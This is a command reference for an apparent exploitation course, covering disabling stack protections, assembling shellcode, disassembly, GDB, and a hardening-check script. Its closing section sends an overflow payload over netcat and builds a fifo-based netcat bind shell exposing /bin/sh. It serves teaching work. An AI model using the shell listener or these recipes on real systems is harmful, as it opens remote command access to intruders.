Useful Commands Reference


Compilation, Assembly, and Linking

Compile C file (32 bit executable):

$ gcc foo.c -o foo                                   # 32 bit machine
$ gcc -m32 foo.c -o foo                              # 64 bit machine
$ gcc -m32 -B /home/mids/m164122/libc foo.c -o foo   # Michelson Labs
Compile C file (32 bit executable, security features disabled):

$ gcc -fno-stack-protector -z execstack foo.c -o foo                                   # 32 bit machine
$ gcc -fno-stack-protector -z execstack -m32 foo.c -o foo                              # 64 bit machine
$ gcc -fno-stack-protector -z execstack -m32 -B /home/mids/m164122/libc foo.c -o foo   # Michelson Labs
Assemble file (shellcode to flat binary):

$ nasm foo.asm -o foo
Assemble file (assembly program to ELF object file):

$ nasm foo.asm -o foo.o -felf
Link assembly code (32 bit, using C runtime, e.g. main):

$ gcc foo.o -o foo                                    # 32 bit machine
$ gcc -m32 foo.o -o foo                               # 64 bit machine
$ gcc -m32 -B /home/mids/m164122/libc foo.o -o foo    # Michelson Labs
Link assembly code (using system calls, e.g. _start):

$ ld foo.o -o foo

Disassembly/Reverse Engineering

Disassemble binary (ELF):

$ objdump -d -Mintel foo > foo.asm
Disassemble binary (flat binary):

$ objdump -bbinary -mi386 -Mintel -D foo > foo.asm
Show contents of binary, with load addresses:

$ objdump -s foo > foo.data
Check if the stack is executable:

$ readelf -l foo       # Look at the flags field of the GNU_STACK header
Check executable section locations/permissions:

$ readelf -S foo
Run program without ASLR (32 bit):

$ setarch linux32 -R ./foo       # Run foo with ASLR off
$ setarch linux32 -R /bin/bash   # Run a shell, no ASLR for child progs
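
Added helper script (not part of the original reference) that automates the GNU_STACK flags check above, reports whether a binary still references the stack protector that -fno-stack-protector removes, and reads the kernel's ASLR setting. The readelf sample lines are constructed; the function names (gnu_stack_flags, stack_is_executable, has_stack_protector, aslr_status, report) are chosen here.

```shell
#!/bin/sh
# Constructed samples of the GNU_STACK line(s) that `readelf -l` prints:
# a 32-bit binary built with `-z execstack` (RWE), a default 32-bit binary
# (RW), and a 64-bit binary, where readelf wraps the header onto two lines.
SAMPLE_EXECSTACK='  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10'
SAMPLE_NX='  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10'
SAMPLE_NX64='  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10'

# gnu_stack_flags: reads `readelf -l` output on stdin and prints the flags
# field of the GNU_STACK header (RWE, RW, ...). Empty output means no header.
gnu_stack_flags() {
    awk '$1 == "GNU_STACK" {
            if (NF < 8) getline        # 64-bit layout: flags sit on the next line
            print $(NF - 1); exit      # flags are the field before the alignment
         }'
}

# stack_is_executable FILE: succeeds (0) if FILE has an RWE GNU_STACK header
stack_is_executable() {
    flags=$(readelf -l "$1" | gnu_stack_flags)
    case "$flags" in *E*) return 0 ;; *) return 1 ;; esac
}

# has_stack_protector FILE: succeeds if FILE references __stack_chk_fail,
# i.e. at least one function was compiled with the stack protector enabled
# (a binary built with -fno-stack-protector has no such symbol)
has_stack_protector() {
    readelf -s "$1" | grep -q '__stack_chk_fail'
}

# aslr_status: the kernel's randomize_va_space value (0 = off, 2 = full)
aslr_status() {
    cat /proc/sys/kernel/randomize_va_space 2>/dev/null || echo unknown
}

# report FILE: one-line hardening summary, e.g. before running a lab binary
report() {
    if stack_is_executable "$1"; then st="executable (RWE)"; else st="non-executable"; fi
    if has_stack_protector "$1"; then sp="on"; else sp="off"; fi
    echo "$1: stack $st, stack protector $sp, ASLR randomize_va_space=$(aslr_status)"
}

# Usage: sh hardening_check.sh ./foo
if [ $# -eq 1 ]; then report "$1"; fi
```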

GDB Commands

Set intel syntax:

(gdb) set disassembly-flavor intel
Debug child processes (useful for debugging server processes):

(gdb) set follow-fork-mode child
Show current instruction after each command:

(gdb) display/i $pc
Step through a nop sled:

(gdb) while *((unsigned char*)$eip) == 0x90
> nexti
> end

Remote Exploitation

Send a payload:

$ python -c 'print "A"*1024' | nc 127.0.0.1 1337   # Python 2 print syntax
Make fifo (special file, FIFO queue):

$ mkfifo fifo
Use a fifo to simulate a netcat shell listener (when nc -e is unsupported):

$ /bin/sh -i < fifo 2>&1 | nc -l 1337 > fifo